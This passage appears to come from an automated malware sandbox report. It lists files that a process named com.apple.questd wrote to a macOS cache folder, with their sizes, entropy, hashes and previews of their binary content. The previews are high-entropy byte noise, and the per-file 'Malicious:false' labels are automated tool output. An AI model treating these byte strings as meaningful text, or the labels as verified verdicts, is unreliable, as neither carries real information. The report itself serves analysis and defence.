                                                                                                    Preview: ..VSzs...@2A...GY....0...P..Y......%......w....Bx;../...F..@..,v.6.....3(Q...=R........6......p....O9..:f.&..<.....^.f&..W..8......Pv2...SU.*s...S...I.C.|o..1j..........'.9.Jm..J..m...r.4U2...sS....)t.iq.tA .]....6...E1J.y"|T..../KU.GrU#W.....6.w.Ul. .%.....I.h....Sb..}....?..>*...S....;&f..o.6.P...x....6.......%.|..r.c!ns(.=..g........o.vNV2....2..y..6..x...s{......._........\...>.Q.?<..l>......uRA9..si.AW.}*jo...a>~...1.rA......:.....<Y......^>.-.-T.J......r.}*.$.n.."......8...z.............`.2+.uF .&....d.S.9...d...v.=.Jo).].n/k....../..<......a..z..A>..Z.)Bk%c....|.G.w......].wD......&....5....y.....`....#+W..........'.=......|{2..e........r<.o.:.a..g~*3s..Y.Bq7....p...3.X..\....4.....C0Y...O......a.`..r.I..>....t.Y.*..4.'c....m..a...z$....L..y.5...u.f\.<o\!b..x..1..H*Vp......WM3......H..G...CS.."...D.....U`..k.T..........).Mys|..%..n^V.j{.CJ.[L..6....go.cz.M..,...(.....LQ..`w&.o..............i1S.<a8./s...}.\.4.T....Z..W.<.e&.'.:l.Ux.eW#.Z..R._*7t;..Z.........RY7b.h....3:+.....6O..
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.C8615B06-CED8-410D-986F-8F7971EB698F.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):49364
                                                                                                    Entropy (8bit):7.995341943407149
                                                                                                    Encrypted:true
                                                                                                    MD5:F68DC7C30B42353462D03DDE03F28111
                                                                                                    SHA1:E6E7D08A51DB9ABF736EE5E2F1FCA68B33E93B59
                                                                                                    SHA-256:D2584580F4CC707042890F81D94C1C12F36F79CE20D5A2D94892F06BACA74C12
                                                                                                    SHA-512:CE8D2C8598A026EC6CB5159A6D438ADB91F0E86CAD90A2D68CE393D95C02258D683120845F20E3648C730C48EC470BD295CBFF457E48C47EAE3B1FCC12273540
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .kw..3.@...4......-...-.jq.gc. ..a.X.(6.%....7.5.R.....G..*..[.3../..C.q...U..X...;[...E''..l...<...(..}..............V...}3[..0P...)#..R........M.j....]?..4.9......$_..................M.t....-....'.K.,.%9/..zn.....`...%..4..X.7t......+...o..~...?f..~J..9.<{k....T-.zq...P./.-.|..g.a...Tj...e...S....mwy..j"5g6+..v=../7U~._....*.."`v.0.S.U^...8Hl.......&...I.H...o....x:...M.9f.....E...?......SW[....9N.6m..%.......I./;.O.=....m...t6............]..S.;).,.]..(/\..W.W.2i..'.WZ..L..".X.-............n...$q.#....y{......Z..W.3(.kzK.%D...../.....e@ZKY...j!.Qs.....}....+h..,'8..B3.R9......J.O(O.D9..(`..!......k.7..T...:....L.-.f{%d.4.A...X1.3..4.u.~..$..j.. ......*.e.....r\...!.X.Y......J..90...w..i...Z.......V..&78...1>.. .m.....P....7..2.......i...[./.+.[...6.......7t..=.g.[......S...ia..n6.TI.}..t....=Z:-..z..N.#.D...,.x.Lmj4....e.I..#iX]2....U...W.\.......Z.. ...i.Z"M....M.`O.. ....`Y......*2..vLP4.a..2>)..OF.;.......#|sL..o...h1.x8..............ey.F.JX%..E.Y......?.$.&....L8......f.....b....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.CE546328-3559-4F5B-A84D-10D624796745.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7290
                                                                                                    Entropy (8bit):7.931615094243727
                                                                                                    Encrypted:false
                                                                                                    MD5:9CEC27E5459BA07110ED0BCE9CFE2C7B
                                                                                                    SHA1:655DAA45B5147748A5A55583F1CCDC26467C143B
                                                                                                    SHA-256:5A0E2E46E0B9888D7FED653088A50C8EEF8F9A4B2070DED046409AF4283F0ABB
                                                                                                    SHA-512:C91CA669E5C1CED7AA37F1937416B3BB73947F6A8F155ABEE7FA7A4DB6CED46E1AF9F3BA78E115C97A41A48052EBD96C762C69D3EB2269C769670C2144E28D66
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..i...#.........*%....w{..r....I.],..(...`...4..........L.$.K.\.K..v...&.~.j.V...~.^..;........v.....9......."LGq......l...t<C..D59T.4.k.C....B......./V.^.b?.....#.......W....e.C9.......9....3..............8......!..~...Wi.f..^..*...E.B6..dF...C,K.P-R,*.]v.....".....2c..h..\.P........*fY).....fi_vM,]....YL.z..Q...7.7...@..ZFcL.......]..Rt....S.u......L..g..M.....].%b&S...72.}...V,s...cg...:..g.X..e..+L...Z..*y..S..]..... {.|.Gj.=u......]...dO>.Q[p.K.m..h..l...4...<...BLZ...3.C.mo......Z..Z9.!>.~|.j..y......d(x..x....4:v.>....F.J...;DN>R..9..J..K..n.".Q.Y.U....:....;..+Q.E('<.)....v.)X;....`1...Jj..u...k...X\..=a...Y..@*.........@.......B....v.".b8>~..n...-......3/..&6U..WmO...y.@.V>C........~.f9.#....F..f..|..k%......N.}...........s..*.cF..rL......n,.....%.d. i....])...NkJt....c...;c.(.......|.W6...>......0g.....5.b..A..........%.%`.......wux....?4.......W5].........S..'T...... .E....'....>.r..z.?.....]._....#D....#4....M2..qV..Vc..vz+h0Bcg.N..Of...Q....i.w.^,^.n...$..Vad..5ps[......x.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.D6966C41-0E6D-4C96-8725-F737F6D4AE52.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):15202
                                                                                                    Entropy (8bit):7.954687915334667
                                                                                                    Encrypted:false
                                                                                                    MD5:D3DA5C828AB89B0F1D78807B6CF436C1
                                                                                                    SHA1:8E23835404BEF182934CD36AE5D7366E8F80B426
                                                                                                    SHA-256:8789B47CC0394F67D05DC684117CC3183EC752C3663900EFE62192FA3C690208
                                                                                                    SHA-512:33CCA75B01D8B2C772FB56043A7547D7A55B9455F71E8423C48A2590AF8EDB029E8210A77DE7F52323FE029CD9AA9828D54F9FB19782D168A0E76C42BA85E2D0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0....2.h..$..z....L<.4.k............0.I.:...6.....3(Q...=R.HB.]E..G..:/.....!..Z......Y....m.I.0.....8.f.JE.!P..n...3vw4.Y..r."..X..S...I.C.|o..1j..........'.9.Jm..J..m...r.4U2...sS....)t....jmP.p#.)....6.4..A|.CzG....\..M....(L..r.tNb..<.OM...3...................s;.Y`.....!9.Zys[..P...x....6......0.:...'h.6.....$.ud.)......n...a....2..yd..7..u?.b...).........N...P4....{.v..IF.h..Jo.6"..1<.......3.......*v.(w/....nb+`..e....c.....U..CU.5.c..[..].......;...}..Xn'...Z.@..n....8.^)...L..... ....~.........\].....?...*.!.I...:.g(....4s..|,.....X.|"~..a..q...E..;.B=O}g.....4.........e..:+[.-l%1`P\......!P..n...3vw4.Y.qh..<S5f#.....a.H...[s..?...7.9(.....czM...u.+....!0...hO......%IRJ..!7d.5..."O....o=..T$..N.Sg....H.ch.Y.*..4.'c....m..a...z$....L..y.5...u.f\.<o\!b..x..1..H*Vp......WM3......H..G...C.Ux..&..i;......R.^<PN.5....E.:sMys|..%....{.Y..CJ.[L..6....go.cz.M..,...(.....LQ..`w&.o..............i1..{..yCN.M .'l.......v.p+..5Y...p..O ]..85b_.\..d.x..........H.ib.f5..W.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.D69DF459-F718-4DA9-867B-8ACBE9F7FBDF.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):18907
                                                                                                    Entropy (8bit):7.9634048527413865
                                                                                                    Encrypted:false
                                                                                                    MD5:C2DAC135FEFFBED21452B33784234C67
                                                                                                    SHA1:1338C8705560E7282BAA39B8BAF6F5F1C71826D4
                                                                                                    SHA-256:2E1DAD436FB2119D5A33CED796791B34595146FD353FFEBAB2A6411963728317
                                                                                                    SHA-512:478B0EE790B2B0D852646E154CC1B319525C8BD9EFB2DCDB80A72DEE1801B9CA10E07E2F5ECC3CD186B810EDB0979DF0B6B0E8DB4493CFC5AAB5806F8C110F74
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0...'.....r....g.!.$.. .|.t.9.....7_...B....6.....3(Q...=R.........-.L.H1...W'A.].f...O9..:f.&..<.....^.f&..W..8......Pv2..r......&.S...I.C.|o..1j..........'.9.Jm..J..m...r.4U2...sS....)tM....U..u..._.5mX.O~?E..0xH.)..0..2.@.-..]>....W..U:.=:el.../..F36xC.k.;..h..S%N...r~V..|.,..lAjP...x....6.......%.|..r."?.)..........{w...n...a....2..y& .]Xu.....~<Y.+....~....._........\...>.Q.?<..l>......uRA9..si.AW.}*jo...a>~.....o....u....@Rqx.Zd4.)..^>.-.-T.J......r.}*.$.n.."......8...z............[?....1F .&.....K..O.n.d...v.=.Jo).].n/.la.......2.L;.C......"........s..k....Z.......~52.G.0... r/.....W..8......Pv2....N..@.Q....=...1#o...^.^.4..(H..r....._Y.E...|U.?.L.i.(I...+ ....}87..V.:A.e..Z.5...CwnN....Dil.9[..;......a^....F.....e.....%..I.P.....w[..".+~...WbG..6.b..i..G....l.H....,k]v..z..F.1I~,.Y6^q,.OH{.....n...aA.bq}...%y.....a>.Fc.U../...u...Ur.}E.Z....m.(-tpdE."....M....`.B...-..hMW..c.....J..Q.u..?....,.$.8.-..6...!.......-.P;r......u.`%....'..t8.HY..N>..t.O.U.....g
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.D6B9EC7A-068E-44A2-9133-60C8C7B21491.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):11362
                                                                                                    Entropy (8bit):7.964151982930249
                                                                                                    Encrypted:false
                                                                                                    MD5:6E2D66D00DC7B84BDF646D87F11A74D1
                                                                                                    SHA1:58A4833233B23D041ECFFD48A44C372D26B5DEB9
                                                                                                    SHA-256:D742986CC1274976017AC3D1CAB70B4AB49AF2AB96F3EC4E42D1BDA45E6B80EB
                                                                                                    SHA-512:C5FAF2E4DC2D27798B7CE164AED98FA62CB4347ED1882D5CFEBCE029E666D97D164A72921929BD643396682BD49245A8E491E6E76C5EC7BFAE6FA84D98E0F63B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..m;p...MB....)K.....3.R.G...m.84.O..c.,.7..=3...<.eF..a....tV....1+&S...I.]R&.v...Y..J<..7t..r.T.:.+eV.v..........QI...ye...}|...t........I.}....-~.EAyW.c....9. y).L..,.~.p..2.3....D....y.&)1*..j.._By.5.s.<H.};.t7..w...q..J....S.",.A%........CO7(G....*o....*..B+......../I|.E..I.1?....V.....|.{..I.G.....EU.X.|..;......e.....7z....-.......l...%.=._x.\..&.....~.......>.......YOa......%...._.........go...SQ...T. ..w$...F.......7..K%.xk.+.lt...Ie:J-H.E..E.&c`..^.....@...../T...+..<.y?...l..x.p.D...^=.=..qnO9.-w}.....8.}.a........j.'T..)...184..1.G.3K3.}...7..p..P.x....W.m%..."....M}.....e+..".'#..7h......U....9.....B.FG.$p$.Yl........u\........+.h.<..-..Bn.f.z(%B....OtH*...qL....n.L.....{w.A<<q%. .m..=.@s......z]~.S..c..`.;Z.7].Rn.e!Jn.7.'...t. ..Y..1-9.?3.7.5.._A..t@...{cp...(.@.....d....eo...<.)|r..E..]..^h.v....iXJ|....?.%}=...g.M)IH...|.f...k.s9...h...{^fC.p.N.}...q..T.X..c'/F.....T.&S.}V.....3.eT.....!Bu.(.....s.E...C...G.k...C2.-.x....."..q..9...z&.....z.e......BZ2.V~.q....lo.:......
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.DABC55FC-2186-47D4-B6D8-29D64E0EE5F2.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):15538
                                                                                                    Entropy (8bit):7.978833112389998
                                                                                                    Encrypted:false
                                                                                                    MD5:E1CB59A282FF3D16E7455F5A3082680B
                                                                                                    SHA1:B5736FF657618BB51565C0AC7366AA21B7B7AFD3
                                                                                                    SHA-256:A849624B717799530939F3AD8469AE7C392BF56F64A0C3F0C76EF4790C7F35A0
                                                                                                    SHA-512:6C96D640E4D2AE49276472C22C62088485E8B22875D7280ADE12A8685335FE828F3D906ED36AB677738ABA2203B3A73949FAFE7CE2273E9C31A3FC694CC801C0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .v..]......,...VjX..M......Y..3.76.........B.....m......3..oQLp_..S.......T8..hD.:lj.a..p=....6..y.Py...?g....m=.0..U+...?.Ylk.....~J&...q%..c....E...MB'..8..!..gwq.8..w...Q"3B...IJE.aZ4...|....M.......%+..+.N........n..!..].1N....4..M%g.c..o[...........RT.=......(.C....q....-2......D.c.....$>D.n.....x........$.p..Kw...Ao...ja.~....L|.q._Vx...U.....s...f...g.>...|.......N.Wu."j..kx..z#.....*b..&........9....#....K.I...w0..Z...~....;...4.v.a?<<T....,G.C.........m._..0z......@D...N.E.R..q9=o~...c.Q..F.m...._.Y+....8...9....eq....(.A4h.[...?.....!.....n....UF....!i.d...;$Gq(..j.71...9S..9..O...X....?...Q...8......5.....~L..+. ....f........_.t...Q..Bz..I........o....6.zStM..m.]0i......b..Wf..C....../.....?...o6..J.#e..o"..:.......F.3.8.==.T...Y.<..v.Y..d_.h....T;.X..C..We..F..9h...".z..dP....../o....=.?..S.....S)\.A...e.._.1..1.=..V.SF..c.....+F..9....R..\..g..fN.~.WV.8..!...UR.....D.M$....v...q...;.\/qS..G.wD..y..TX!..A........LN...%LdG.es..Oj......N..r...P.jb...U.82.q........P.7.Ws.o...h
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.E49511D2-0914-4340-9529-C62CDEBFB026.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):23235
                                                                                                    Entropy (8bit):7.963906562591004
                                                                                                    Encrypted:false
                                                                                                    MD5:C7DD12849EEBD193B25A90D765A0BD74
                                                                                                    SHA1:FD3E824AAC8E111E9A2CB4C12328C38E073570A9
                                                                                                    SHA-256:AD7768AD88D1BAD36BA23147D56D1D5AC56A54E2DE67F051C816A2AE45B2412C
                                                                                                    SHA-512:AA09F023AF57A90CAEB0A5AA9599CB18782D14F5B439F6D93182AF9517B1C6830B479AB118ECFFA901221633673DBB86960AF54097E06AFDF36C416F6F8F1C43
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0....]....%..+.xQ.M....2.E..!...5.C..$`nQ.=.6.....3(Q...=R.xh`..&..dUY..1o~pe...I...u....-..q.:....1..KkT....po.(`#.;.`nY..b.Z.bn.g...Pv2...mP..k.Q4c....(..<i.>H_.....zg.R.(|......_.S..4@.O.......:...A......s3D..N[.R../.D#......m.].....=......a.u...../....O....n$.d...q.+w.....5..B.#.TA.B..*..........~.n(<.k..F*.Q4.....(...L.9P.q..d..G]L9....A..(...$.&..s.(O..Cb.y[M2i..^>.-.-T..p..nf5WW.....M.w8..{...wi8H.j.iH..b.\..XX....E...V.Z.*..u.F...F..m^..,3..Xy.S.<.A3._.._....X.:..c.......D*.~..h..V.Jn.l$.......>x.L.B:{+.3..!.[..W.q.g(.xJ...#6S#@..K+...{.N.BB.......+,.i..b.Z.l...=..C.G..?p..o._...o..LZ..2.....U.ym.....M(,.R.....~..:..E....v.Y.KI....O.H.q.p..\.......f.S.bN..4.J.../....[.f....P.Z:.G. ..2w...z...#...Vh1.?z^..B.)?/1.........=4S...Y..<1..m......r...j.. ..d@.k......V..m.cf5.aa).I...?..5..[.L..@....zM.......<..g5......Koy.,.t.|....N.~...8...on"...'0cx.DM...C...w.~..-.q....B..-.....9E}U!.....VE......R.N..>f.M..#V....1&O.$.7.a(...w.e*@...;..I...... )..B.....j........
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.EF800331-1827-42E1-99D6-A8EB01721BEA.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):16803
                                                                                                    Entropy (8bit):7.954418118083476
                                                                                                    Encrypted:false
                                                                                                    MD5:0AA2D9B2F7249F0529F9FF803AC70BF7
                                                                                                    SHA1:0B0BFDDDEED06EF7C31073BB138493BA8C277E28
                                                                                                    SHA-256:02DB419DB0E1A70E9E650D2CDC215AA32D6C57BEBD06C53869B8F58443FDAE8A
                                                                                                    SHA-512:1CA4C6C7359F701A1EA9FAE770148FC5D59910D820278393F7F67F97E6CB04F75EC2EF19BF3F13736A6518635EEC3789759518B0E6A6202D387A1C88F38F0FBA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0..............2D......Q.h..]...R..9....)...6.....3(Q...=R.<..U.g........w....Y....m.I.0.....8.f.JE.!P..n...../..?:.o....C8@e...l.K..1*.9$<..<:...........r.....x...........~L:P.........|..s.UV..l...<....p.J....*.qj...{...^5)..>?..W.x1..S..'Z.-?.F..1nK'...vZ.....X.....VA/....9.7J.i(j....I.n..A;8x....@..`.......D.=x....E.:s.q.:....%.63$..I^I....2.....A..(...$.&..s.(O..Cb.y[M2i..^>.-.-T..p..nf5WW.....M...q...b.......z..."+..a/g....\.x..V.Z.*..u.F...F..m^..,3..Xy.S.<.A3._.._6..C.....c......../.....[.....|.......>q.......s......U...\.W....-M.g1.+.H.}K..V..(..h....^%.....m...l...1.....l....Z.p..|o..1j...,...rG.w.?..U!)qwVAa.^....o...{W.l.....p&.6.y.q7....p.O.?....U.d...`V...M..!.B.q.........?..q..}..8....[.4..>..T....F....K.48..Q....*}D7.v...1..=...0...l..jlm|,.$.@~...)..A;.f....._s0.s.5/'.tY....0h....N.l..#.>E.oY......&d.O...t>e.z=.+........x.....X...k.....u4.yK^..=.....|...i..)..7j......=..^r;bj.5....9E}U!..B........o.ARW.,H.+.v.d.g..d.h...a..,...8r.......0}o.........C
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.F544E7E4-DC44-4992-AA32-64B0AACA85D5.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):6706
                                                                                                    Entropy (8bit):7.9154740554602245
                                                                                                    Encrypted:false
                                                                                                    MD5:329E5DFBB17B637865C7360B65C202DA
                                                                                                    SHA1:17E092A63F76CA4E19FCD71233D0E0901EBA9FAD
                                                                                                    SHA-256:48A1CCFF599B8F3B85709CD6261A855E5682D100457FC4E4CF03DABA032551EC
                                                                                                    SHA-512:D3E3D8E0CE8C67F22EE5FB6588E82459CA336A28EFB242C2FCCA6C30BBDB8D6815AD831E804BA55D6F35D9EFBB39B51D8FE76DAE58AE40B89A8478F1BE83CE37
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0..x..`)%5.........VZ.w..<O9?...6/.....Cc.?.6.....3(Q...=R.V...[f.._..V..Y~...O9..:f.&..<.....^.f&..W..8.....A`1.........q$.t......r......+.N8...J..s-.q|...A.I........T...;....e(......`..O.....-..2.B l.N.c.F.x.{v.k*).....*,....Cm....d$..nv.U...d]..s..VT...K8.9(....0k..[.......~.n...D..][.p3.n.%.............e...r^..S....C..8..x'E!............uph..Q....*}D7.v...1..=...0...l..jlm|,.$.@~...)..A;.f....._s.\..U2.P.=#...8aE....E......3....T..'.C.Cd.d. ....:..(.?,..M..z......."........ja.....`p.1.......u.....8i.!.j.)v{D...yU.-&......Y.\xR.J-I....ef.....S....v.sgp,........+.5j..U~.U....f,.C.G..?p...]s.........'.=...I+L.....[.6F.%i.;fMM..x....X.....,....T.x0.........F))&..q.d........E4..".v.L7.../.....^..`..SFx!..rhAkD...h...T.Y.<....^......o..b<.WB....{.Lwx........P4....{.v..IF.h..Jo.6"..1<.......3.......*v.(w/....nb.TA.B..*.n."3......f.,.d1..m......7........<.*...B<.cf7G...[.6F...P.5....x....X.......7a`....x..1s.......o.....`.mN...h...s...C.v.u...).....F..........s..N..f\x
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.F875B970-8B33-4980-B48D-48EED08CD892.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7194
                                                                                                    Entropy (8bit):7.920410137156591
                                                                                                    Encrypted:false
                                                                                                    MD5:C0472AC05B7794591D9CF46959E10172
                                                                                                    SHA1:2A95FB5BF7152D7AE7790400DC41174F897EB3DD
                                                                                                    SHA-256:FE46EBBF2BB765A1FACA03795F7870A9978F9543ED896DAE83E6670F44D25C4E
                                                                                                    SHA-512:6BB1B91D5A0B73E147C29CCA2AE9C1F10681043501228157B15561DE732E1E167638951905080CEFE67A310B731D207065A00174B3BA624F5D5490B4F33C920F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..VSzs...@2A...GY....0..o.u..9..a...........Ws#.H...z".>..r.Q|...6.....3(Q...=R........6........,.....t....l....oA.............<..1*.9$<.oQ..J.......W>...#3...x..x _K'N..h)..""..~?.a.?'............u4......RB.N....-+...........M.f....q......[...!t...!=W>&&.......I.......bo.%.....>{.@..~.......`Q...L..2....z.T...Y|.>....W.d2%..}.....k2bg.h...[..E...N.......].....3.te....6......_........\...>.Q.?<..l>......uRA9..si.AW.}*jo...a>~.....o....u....'%r}.....u..^>.-.-T..b#..."..}*.$.n.."......8...z............r..'...F .&......ZX..W[w.....^1.a...W...5...H..."~.......b/...6>..Z.)Bk.Mq)..t.[....&.?.......~52.G.0... r/.....W..8......Pv2....I.....|..O.p.......ni........c...N/_i.....O.H.....1i.?7{..)8.RO....u....d3...}...r..L....r6[!...4..l"B..?.......`.e. ....f.,.....K".R......Ua)..8.,...6w*...Q...i......b....!5...Np=t...{.3.v...4.....RA9..si.y!....'1"....)?.l.!.|.}W...R#.Y.8..1'..S.M.>x?d.b..6..(G.....W>.......8...r..O...V......G..).&.......3b.^&Bp...E..%..F.....p.&..:..v>..xX....E.h]i.....D..n{..bv
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.FA0D1E3D-C48E-4D35-8AB7-0FF0C6DB72ED.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):38260
                                                                                                    Entropy (8bit):7.991907002338352
                                                                                                    Encrypted:true
                                                                                                    MD5:57D7FB48A2DA6383700C88D99B4B9498
                                                                                                    SHA1:BC353B5737ECA199D87A1E8D6C518DCCCBEFA8CC
                                                                                                    SHA-256:698FB8113EB207A251E2078A5F4FC93DEB87F22891ECF55949E43DC0BE9BBDE8
                                                                                                    SHA-512:07C64373DEB03D61D4A27244A0525847E11D35D013D2438BC571FF2A3E6782475AB0649EE0118E9BFF5DE9871215F9D9CB64E16F0EA9A4AB3EB73C98EC7B401B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: `...d.@..*._O...0}...}.%.N9....."-.....U.h*.1..&...Y...{.y.N.-.....@.53..9............:......b.Ve.....uA@.h.x..!D;..D..R..!A?...}...+..*.t.."..7Zwx._...").5Z~8.e.....+.................y..!7.......n}...Mmx...Y@..!..).%...".D..J..W2.|...A..WMJ..).7...r...l{(b.x.6...>Od..&..3...P}....qM..W\..?=.. Dd.M...G".....q.z.>[K..K'.!.v.H.6.&.....M,.UD&..*.&..,k"...;?...U..q..sz[..}K.E.....E......K/9...........k..8....d.,cY..U.....V;:.*.3T1.....N...+.5..joW}%.../.@..H..j..b...JI..]a.Z(c.5.......FI...WQ.K..g.....}......G..).E....f!...u..Or..X..`..7\....\1.....v...q...ma.=.-......x7=?Oc...H....4r...v.......k.{.....:.,.....l.....7D.}..G........`..oL..R&..'.I.?tE8.....f..d..N.@...Do..,.!..?...H...>.M..<.....uu...c..H.;qsS.r5..=q..9\#s.."I.?..sC@...........".s...fQKy9..?....5..c.........0...{.+L.m...Y.m./c"....m.U[....Zm....U.0.i7]......a....,|......./......../...C.ZC+.ei..^.|U...i%..../Z/N....w.ew4~H.V..............K.,*....8.4.....<.?..@..k)nm......FT...93\"B*3q..Y.......a0.t.:..;.C...I....^.K5SJ2f..|._
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.FAA4DC3A-0A99-4436-BF3F-1022F1844DB0.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):8298
                                                                                                    Entropy (8bit):7.951231021723601
                                                                                                    Encrypted:false
                                                                                                    MD5:6A0C9C74CFD261EBBDB79F96BD89D92C
                                                                                                    SHA1:0DEF563FE62830A0EEB9190D3352F9E40C7D3C89
                                                                                                    SHA-256:61C69BFB6D076FAD45DC6E5D54EED6F1FBF2D7E7F5195AFBACE5E1F6FEE09916
                                                                                                    SHA-512:604821AEE57B6E403ABE2422C4FED49AB8884EEAA976D5B480F8CB1161507DCD50CAA4D50DD901B799A2A7659711202D7CDAE42C887E7A965A10D27DD59678A1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: C..y\\0Ho......<R_..w.Yd.!...j>.L..s/.q.i|h:.h|._.].Q...YW.=.....cYY.=.Y.........s)....V.+...4O.!.[..F9..Y.R....bU..r..`.H]LAzQ..&!.`@$...u.L.......;h.....V....i^..od...c..%..;..#A...2.......c...m.9....w..k0jq$...~..Q.......Pd~^.@.l.b...@..sG$I...Q..Nh.^.IC(.qf{.l..:.>$U.{,....e..Xt..}.........`.......p. ..C9...a.x.....$..f........-.........X....7..4(Rc:.@.]...( ?.jB.L..0.......'YP.[...n..]Y..@.-D}..Ro.R.&<...9S....!>..wZRk.......`..>.R2..FvT\.{.[......vk.B&..H.S..........1.FyG..Bj.i+..yD.........M...9...SOF..^.S..J..vx.U...[X....!2........5..I.Bo.=tt...2.........k.l........p..9[P.F.$Yg<...&........3u.T.f{..[z....y.+..W......<....v-...*i.....n..=....`.$.+.-..=..iP.......pQ..z...i.x....tW.....d.8F.|.//......T.EnA...[.eK.p|......].E...I....R#.6..MK9..+..dFaR....~/.2.[Pz.p..."....F.1wr....9....4...S..H.h..z.A..5.g.{.m......)...^...a........m.K..<z....xh..4IO...0$..Gr}{.._=L.....NI.H.&.>.t.;.......'V.............O.0%.....<..+...O,N....{V.....nW....DT7G6.".W......-J......SH....K(.m_U....Xd(
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.FD903209-35B2-4084-9787-4F04A4A47668.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):29459
                                                                                                    Entropy (8bit):7.990340413395018
                                                                                                    Encrypted:true
                                                                                                    MD5:53BBB11FF006AB23CE93BC10DD01578A
                                                                                                    SHA1:99B31E43BFB98D76752D9485DA5A3F9885A53E87
                                                                                                    SHA-256:3171BCBCE9C170E8F7AC4D8CD7ED4BCD4FF42CB25B0C33A1F941746FDFA441BD
                                                                                                    SHA-512:16FAFCB6580977B24B8AD567ABB02AAA4F30A703E6C61BB7EB215AA45E782525DE54567C72B19FE8069A469D3FEF479DB9F6BCDA66F000EDFD462BF6BCCC8FA4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: W....K..5.$...Z.%.(;".bl..... .`..o*e..]O]W........H.`..../b2.B....z,..j...L..z......(..S..f.....T...o ?4.K|......>.&...=....(.es........Tz.lve6..ZIE.I;....S.s.......6Hsg[.5fM...........0.....=...........x..........$.l...=................H..^-...;..v$._WG:|.]..!4w.).H..+.Yc....u..z....(............>....i.gw.c.c.......'.....d...+3..,...PYn.M..(M..A..v.....;......a.h5..g...S.a.m.e.....L...)]....(....a..vU..2F..s...0..g..w..T.o..E..!...l...I..$..J.....!.S..P.-l..2..dQ..d.....>..9.~..;.irY.{}b...x..~w63...>...b.4Q`b.V..oQb..v..d..G4..=C..|.uf.o...[..._..N...WwO...@....U..e..$....H...M.x.....qX...Z..9j...h3.....}3....3..z_.%....8.ck..P..5..q....% ..S.".........A..@.@.....dlx.#....a .r..6.._k|4...HI.i...d...?".nb..?....}uG..&l..Z......h..u2Y.,....@..h....S`...2. ..y.c..Ld......Y...?&.<u.d....-...&B.]BsP:..f...v.{X.v.......@".4'..@.....qA.....C./...s-.0...K....j.M.~.(..x:.r.../....T..K...w5...oB.^1.M...,.2E+b......$..l.P..)......I).b..!\.Q....L/q.....7f.....M..y...wfdt.o(.....ej.........W...A
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/fsCachedData/.FFC8148E-E094-4BEB-82A1-6EFE576FE87D.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):25931
                                                                                                    Entropy (8bit):7.9886468285542875
                                                                                                    Encrypted:false
                                                                                                    MD5:B876AB15137117A8AD3408CB471D175C
                                                                                                    SHA1:11F078EE28C11355543BA2705FAB79B5693E843F
                                                                                                    SHA-256:EA6CDC799345CB1BE32C8EDAD3B2D154ECDE6DC43AE08F62BEC3EFA0243F05CD
                                                                                                    SHA-512:20AA21F00AAF39B0B76D738620815F5C920BE4AA2EFC897AEDA0D9DB88AC2B9BC14EA34026E01A1A7282E580A9C14229A105B347B348CDA77B8E6AE9E91FDF7E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
